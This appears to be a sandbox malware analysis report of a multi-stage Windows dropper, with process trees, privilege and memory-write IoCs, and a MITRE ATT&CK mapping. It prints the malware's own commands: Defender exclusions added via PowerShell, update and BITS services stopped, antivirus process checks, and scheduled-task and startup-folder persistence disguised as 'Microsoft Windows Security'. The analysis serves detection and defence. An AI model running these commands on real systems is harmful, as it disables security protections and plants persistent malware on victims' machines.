4363463463464363463463463.exetasklist.exepowershell.exetasklist.exeRegSvcs.exe75608328.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	4800	4363463463464363463463463.exe
Token: SeDebugPrivilege	4832	tasklist.exe
Token: SeDebugPrivilege	5044	powershell.exe
Token: SeDebugPrivilege	3268	tasklist.exe
Token: SeDebugPrivilege	4876	RegSvcs.exe
Token: SeDebugPrivilege	4676	75608328.exe
Token: SeDebugPrivilege	3240	powershell.exe
Token: SeIncreaseQuotaPrivilege	3240	powershell.exe
Token: SeSecurityPrivilege	3240	powershell.exe
Token: SeTakeOwnershipPrivilege	3240	powershell.exe
Token: SeLoadDriverPrivilege	3240	powershell.exe
Token: SeSystemProfilePrivilege	3240	powershell.exe
Token: SeSystemtimePrivilege	3240	powershell.exe
Token: SeProfSingleProcessPrivilege	3240	powershell.exe
Token: SeIncBasePriorityPrivilege	3240	powershell.exe
Token: SeCreatePagefilePrivilege	3240	powershell.exe
Token: SeBackupPrivilege	3240	powershell.exe
Token: SeRestorePrivilege	3240	powershell.exe
Token: SeShutdownPrivilege	3240	powershell.exe
Token: SeDebugPrivilege	3240	powershell.exe
Token: SeSystemEnvironmentPrivilege	3240	powershell.exe
Token: SeRemoteShutdownPrivilege	3240	powershell.exe
Token: SeUndockPrivilege	3240	powershell.exe
Token: SeManageVolumePrivilege	3240	powershell.exe
Token: 33	3240	powershell.exe
Token: 34	3240	powershell.exe
Token: 35	3240	powershell.exe
Token: 36	3240	powershell.exe
Token: SeIncreaseQuotaPrivilege	3240	powershell.exe
Token: SeSecurityPrivilege	3240	powershell.exe
Token: SeTakeOwnershipPrivilege	3240	powershell.exe
Token: SeLoadDriverPrivilege	3240	powershell.exe
Token: SeSystemProfilePrivilege	3240	powershell.exe
Token: SeSystemtimePrivilege	3240	powershell.exe
Token: SeProfSingleProcessPrivilege	3240	powershell.exe
Token: SeIncBasePriorityPrivilege	3240	powershell.exe
Token: SeCreatePagefilePrivilege	3240	powershell.exe
Token: SeBackupPrivilege	3240	powershell.exe
Token: SeRestorePrivilege	3240	powershell.exe
Token: SeShutdownPrivilege	3240	powershell.exe
Token: SeDebugPrivilege	3240	powershell.exe
Token: SeSystemEnvironmentPrivilege	3240	powershell.exe
Token: SeRemoteShutdownPrivilege	3240	powershell.exe
Token: SeUndockPrivilege	3240	powershell.exe
Token: SeManageVolumePrivilege	3240	powershell.exe
Token: 33	3240	powershell.exe
Token: 34	3240	powershell.exe
Token: 35	3240	powershell.exe
Token: 36	3240	powershell.exe
Token: SeIncreaseQuotaPrivilege	3240	powershell.exe
Token: SeSecurityPrivilege	3240	powershell.exe
Token: SeTakeOwnershipPrivilege	3240	powershell.exe
Token: SeLoadDriverPrivilege	3240	powershell.exe
Token: SeSystemProfilePrivilege	3240	powershell.exe
Token: SeSystemtimePrivilege	3240	powershell.exe
Token: SeProfSingleProcessPrivilege	3240	powershell.exe
Token: SeIncBasePriorityPrivilege	3240	powershell.exe
Token: SeCreatePagefilePrivilege	3240	powershell.exe
Token: SeBackupPrivilege	3240	powershell.exe
Token: SeRestorePrivilege	3240	powershell.exe
Token: SeShutdownPrivilege	3240	powershell.exe
Token: SeDebugPrivilege	3240	powershell.exe
Token: SeSystemEnvironmentPrivilege	3240	powershell.exe
Token: SeRemoteShutdownPrivilege	3240	powershell.exe

Suspicious use of FindShellTrayWindow 5 IoCs

Processes:

Jurisdiction.pifngown.exe

pid process

2388 Jurisdiction.pif
2388 Jurisdiction.pif
2388 Jurisdiction.pif
4384 ngown.exe
4384 ngown.exe
Suspicious use of SendNotifyMessage 5 IoCs

Processes:

Jurisdiction.pifngown.exe

pid process

2388 Jurisdiction.pif
2388 Jurisdiction.pif
2388 Jurisdiction.pif
4384 ngown.exe
4384 ngown.exe

pid	process
2388	Jurisdiction.pif
2388	Jurisdiction.pif
2388	Jurisdiction.pif
4384	ngown.exe
4384	ngown.exe

pid	process
2388	Jurisdiction.pif
2388	Jurisdiction.pif
2388	Jurisdiction.pif
4384	ngown.exe
4384	ngown.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

4363463463464363463463463.exesplwow64.exet1.execmd.exesysklnorbcv.execmd.execmd.exeJurisdiction.pif

description	pid	process	target process
PID 4800 wrote to memory of 4232	4800	4363463463464363463463463.exe	t1.exe
PID 4800 wrote to memory of 4232	4800	4363463463464363463463463.exe	t1.exe
PID 4800 wrote to memory of 4232	4800	4363463463464363463463463.exe	t1.exe
PID 4800 wrote to memory of 3928	4800	4363463463464363463463463.exe	splwow64.exe
PID 4800 wrote to memory of 3928	4800	4363463463464363463463463.exe	splwow64.exe
PID 4800 wrote to memory of 3928	4800	4363463463464363463463463.exe	splwow64.exe
PID 3928 wrote to memory of 704	3928	splwow64.exe	cmd.exe
PID 3928 wrote to memory of 704	3928	splwow64.exe	cmd.exe
PID 3928 wrote to memory of 704	3928	splwow64.exe	cmd.exe
PID 4232 wrote to memory of 3068	4232	t1.exe	sysklnorbcv.exe
PID 4232 wrote to memory of 3068	4232	t1.exe	sysklnorbcv.exe
PID 4232 wrote to memory of 3068	4232	t1.exe	sysklnorbcv.exe
PID 704 wrote to memory of 4832	704	cmd.exe	tasklist.exe
PID 704 wrote to memory of 4832	704	cmd.exe	tasklist.exe
PID 704 wrote to memory of 4832	704	cmd.exe	tasklist.exe
PID 704 wrote to memory of 3560	704	cmd.exe	findstr.exe
PID 704 wrote to memory of 3560	704	cmd.exe	findstr.exe
PID 704 wrote to memory of 3560	704	cmd.exe	findstr.exe
PID 3068 wrote to memory of 2440	3068	sysklnorbcv.exe	cmd.exe
PID 3068 wrote to memory of 2440	3068	sysklnorbcv.exe	cmd.exe
PID 3068 wrote to memory of 2440	3068	sysklnorbcv.exe	cmd.exe
PID 3068 wrote to memory of 2504	3068	sysklnorbcv.exe	cmd.exe
PID 3068 wrote to memory of 2504	3068	sysklnorbcv.exe	cmd.exe
PID 3068 wrote to memory of 2504	3068	sysklnorbcv.exe	cmd.exe
PID 2440 wrote to memory of 5044	2440	cmd.exe	powershell.exe
PID 2440 wrote to memory of 5044	2440	cmd.exe	powershell.exe
PID 2440 wrote to memory of 5044	2440	cmd.exe	powershell.exe
PID 2504 wrote to memory of 3336	2504	cmd.exe	sc.exe
PID 2504 wrote to memory of 3336	2504	cmd.exe	sc.exe
PID 2504 wrote to memory of 3336	2504	cmd.exe	sc.exe
PID 2504 wrote to memory of 2580	2504	cmd.exe	sc.exe
PID 2504 wrote to memory of 2580	2504	cmd.exe	sc.exe
PID 2504 wrote to memory of 2580	2504	cmd.exe	sc.exe
PID 2504 wrote to memory of 4652	2504	cmd.exe	sc.exe
PID 2504 wrote to memory of 4652	2504	cmd.exe	sc.exe
PID 2504 wrote to memory of 4652	2504	cmd.exe	sc.exe
PID 2504 wrote to memory of 760	2504	cmd.exe	sc.exe
PID 2504 wrote to memory of 760	2504	cmd.exe	sc.exe
PID 2504 wrote to memory of 760	2504	cmd.exe	sc.exe
PID 2504 wrote to memory of 2788	2504	cmd.exe	sc.exe
PID 2504 wrote to memory of 2788	2504	cmd.exe	sc.exe
PID 2504 wrote to memory of 2788	2504	cmd.exe	sc.exe
PID 704 wrote to memory of 3268	704	cmd.exe	tasklist.exe
PID 704 wrote to memory of 3268	704	cmd.exe	tasklist.exe
PID 704 wrote to memory of 3268	704	cmd.exe	tasklist.exe
PID 704 wrote to memory of 2680	704	cmd.exe	findstr.exe
PID 704 wrote to memory of 2680	704	cmd.exe	findstr.exe
PID 704 wrote to memory of 2680	704	cmd.exe	findstr.exe
PID 704 wrote to memory of 3900	704	cmd.exe	cmd.exe
PID 704 wrote to memory of 3900	704	cmd.exe	cmd.exe
PID 704 wrote to memory of 3900	704	cmd.exe	cmd.exe
PID 704 wrote to memory of 2200	704	cmd.exe	findstr.exe
PID 704 wrote to memory of 2200	704	cmd.exe	findstr.exe
PID 704 wrote to memory of 2200	704	cmd.exe	findstr.exe
PID 704 wrote to memory of 1960	704	cmd.exe	cmd.exe
PID 704 wrote to memory of 1960	704	cmd.exe	cmd.exe
PID 704 wrote to memory of 1960	704	cmd.exe	cmd.exe
PID 704 wrote to memory of 2388	704	cmd.exe	Jurisdiction.pif
PID 704 wrote to memory of 2388	704	cmd.exe	Jurisdiction.pif
PID 704 wrote to memory of 2388	704	cmd.exe	Jurisdiction.pif
PID 704 wrote to memory of 3340	704	cmd.exe	choice.exe
PID 704 wrote to memory of 3340	704	cmd.exe	choice.exe
PID 704 wrote to memory of 3340	704	cmd.exe	choice.exe
PID 2388 wrote to memory of 3224	2388	Jurisdiction.pif	cmd.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3320
- C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe
  "C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"
  2⤵
  - Checks computer location settings
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4800
- - C:\Users\Admin\AppData\Local\Temp\Files\t1.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\t1.exe"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4232
  - - C:\Windows\sysklnorbcv.exe
      C:\Windows\sysklnorbcv.exe
      4⤵
      Modifies security service
      Windows security bypass
      Checks computer location settings
      Executes dropped EXE
      Windows security modification
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:3068
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2440
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
        6⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5044
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2504
      - C:\Windows\SysWOW64\sc.exe
        
        sc stop UsoSvc
        6⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:3336
      - C:\Windows\SysWOW64\sc.exe
        
        sc stop WaaSMedicSvc
        6⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:2580
      - C:\Windows\SysWOW64\sc.exe
        
        sc stop wuauserv
        6⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:4652
      - C:\Windows\SysWOW64\sc.exe
        
        sc stop DoSvc
        6⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:760
      - C:\Windows\SysWOW64\sc.exe
        
        sc stop BITS
        6⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:2788
    - - C:\Users\Admin\AppData\Local\Temp\75608328.exe
        
        C:\Users\Admin\AppData\Local\Temp\75608328.exe
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4676
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
        6⤵
        
        PID:5024
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
        7⤵
        
        PID:848
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
        6⤵
        
        PID:2024
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /delete /f /tn "Windows Upgrade Manager"
        7⤵
        
        PID:3300
    - - C:\Users\Admin\AppData\Local\Temp\1672332105.exe
        
        C:\Users\Admin\AppData\Local\Temp\1672332105.exe
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4356
    - - C:\Users\Admin\AppData\Local\Temp\2042823420.exe
        
        C:\Users\Admin\AppData\Local\Temp\2042823420.exe
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4064
      - C:\Users\Admin\AppData\Local\Temp\2654516695.exe
        
        C:\Users\Admin\AppData\Local\Temp\2654516695.exe
        6⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:2404
    - - C:\Users\Admin\AppData\Local\Temp\234414530.exe
        
        C:\Users\Admin\AppData\Local\Temp\234414530.exe
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4232
- - C:\Users\Admin\AppData\Local\Temp\Files\splwow64.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\splwow64.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3928
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c copy Beijing Beijing.bat & Beijing.bat
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:704
    - - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:4832
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "wrsa opssvc"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3560
    - - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:3268
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2680
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c md 197036
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3900
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V "CRAWFORDFILLEDVERIFYSCALE" Mtv
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2200
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b ..\Twisted + ..\Molecular + ..\Sponsorship + ..\Various + ..\Witch + ..\Spirit + ..\See + ..\Fitting T
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1960
    - - C:\Users\Admin\AppData\Local\Temp\197036\Jurisdiction.pif
        
        Jurisdiction.pif T
        5⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        Suspicious use of WriteProcessMemory
        
        PID:2388
    - - C:\Windows\SysWOW64\choice.exe
        
        choice /d y /t 5
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3340
- - C:\Users\Admin\AppData\Local\Temp\Files\bandwidth_monitor.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\bandwidth_monitor.exe"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    PID:3752
- - C:\Users\Admin\AppData\Local\Temp\Files\vidar.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\vidar.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Checks processor information in registry
    - Suspicious behavior: EnumeratesProcesses
    PID:1172
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\JKEGHDGHCGHD" & exit
      4⤵
      System Location Discovery: System Language Discovery
      PID:3916
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 10
        5⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:4164
- - C:\Users\Admin\AppData\Local\Temp\Files\ggg.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\ggg.exe"
    3⤵
    - Executes dropped EXE
    PID:2876
  - - C:\Users\Admin\AppData\Local\Temp\Files\ggg.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\ggg.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:364
- - C:\Users\Admin\AppData\Local\Temp\Files\ngown.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\ngown.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    PID:4384
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\ngown.exe"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4876
- - C:\Users\Admin\AppData\Local\Temp\Files\Set_up.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\Set_up.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:232
- - C:\Users\Admin\AppData\Local\Temp\Files\aaa.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\aaa.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:5064
- - C:\Users\Admin\AppData\Local\Temp\Files\nefor.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\nefor.exe"
    3⤵
    - Executes dropped EXE
    PID:3456
- - C:\Users\Admin\AppData\Local\Temp\Files\pi.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\pi.exe"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    PID:2828
  - - C:\Windows\sysppvrdnvs.exe
      C:\Windows\sysppvrdnvs.exe
      4⤵
      Modifies security service
      Windows security bypass
      Checks computer location settings
      Executes dropped EXE
      Windows security modification
      System Location Discovery: System Language Discovery
      Suspicious behavior: SetClipboardViewer
      PID:2980
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:444
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
        6⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        
        PID:5024
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:776
      - C:\Windows\SysWOW64\sc.exe
        
        sc stop UsoSvc
        6⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:2584
      - C:\Windows\SysWOW64\sc.exe
        
        sc stop WaaSMedicSvc
        6⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:4020
      - C:\Windows\SysWOW64\sc.exe
        
        sc stop wuauserv
        6⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:2696
      - C:\Windows\SysWOW64\sc.exe
        
        sc stop DoSvc
        6⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:3744
      - C:\Windows\SysWOW64\sc.exe
        
        sc stop BITS /wait
        6⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:3652
- - C:\Users\Admin\AppData\Local\Temp\Files\s.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\s.exe"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    PID:628
  - - C:\Windows\sysvplervcs.exe
      C:\Windows\sysvplervcs.exe
      4⤵
      Modifies security service
      Windows security bypass
      Checks computer location settings
      Executes dropped EXE
      Windows security modification
      System Location Discovery: System Language Discovery
      PID:4672
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4424
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
        6⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        
        PID:2164
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1536
      - C:\Windows\SysWOW64\sc.exe
        
        sc stop UsoSvc
        6⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:1948
      - C:\Windows\SysWOW64\sc.exe
        
        sc stop WaaSMedicSvc
        6⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:3252
      - C:\Windows\SysWOW64\sc.exe
        
        sc stop wuauserv
        6⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:3816
      - C:\Windows\SysWOW64\sc.exe
        
        sc stop DoSvc
        6⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:4368
      - C:\Windows\SysWOW64\sc.exe
        
        sc stop BITS /wait
        6⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:2960
- - C:\Users\Admin\AppData\Local\Temp\Files\Survox.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\Survox.exe"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Checks whether UAC is enabled
    - Drops file in Program Files directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious behavior: SetClipboardViewer
    PID:1652
- C:\Windows\SysWOW64\cmd.exe
  cmd /c schtasks.exe /create /tn "Wall" /tr "wscript //B 'C:\Users\Admin\AppData\Local\GreenTech Dynamics\EcoCraft.js'" /sc minute /mo 5 /F
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3224
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks.exe /create /tn "Wall" /tr "wscript //B 'C:\Users\Admin\AppData\Local\GreenTech Dynamics\EcoCraft.js'" /sc minute /mo 5 /F
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:2580
- C:\Windows\SysWOW64\cmd.exe
  cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EcoCraft.url" & echo URL="C:\Users\Admin\AppData\Local\GreenTech Dynamics\EcoCraft.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EcoCraft.url" & exit
  2⤵
  - Drops startup file
  - System Location Discovery: System Language Discovery
  PID:4468
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3240
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /run /tn "Microsoft Windows Security"
  2⤵
  PID:1336
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:4984
- C:\Windows\System32\conhost.exe
  C:\Windows\System32\conhost.exe
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  PID:2968
- C:\Windows\System32\dwm.exe
  C:\Windows\System32\dwm.exe
  2⤵
  PID:4084
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ydcfdz#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:540
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /run /tn "Microsoft Windows Security"
  2⤵
  PID:3744
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:940
- C:\Windows\System32\dwm.exe
  C:\Windows\System32\dwm.exe
  2⤵
  PID:2340

C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe
"C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe"
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:4072

C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe
"C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe"
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2564

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

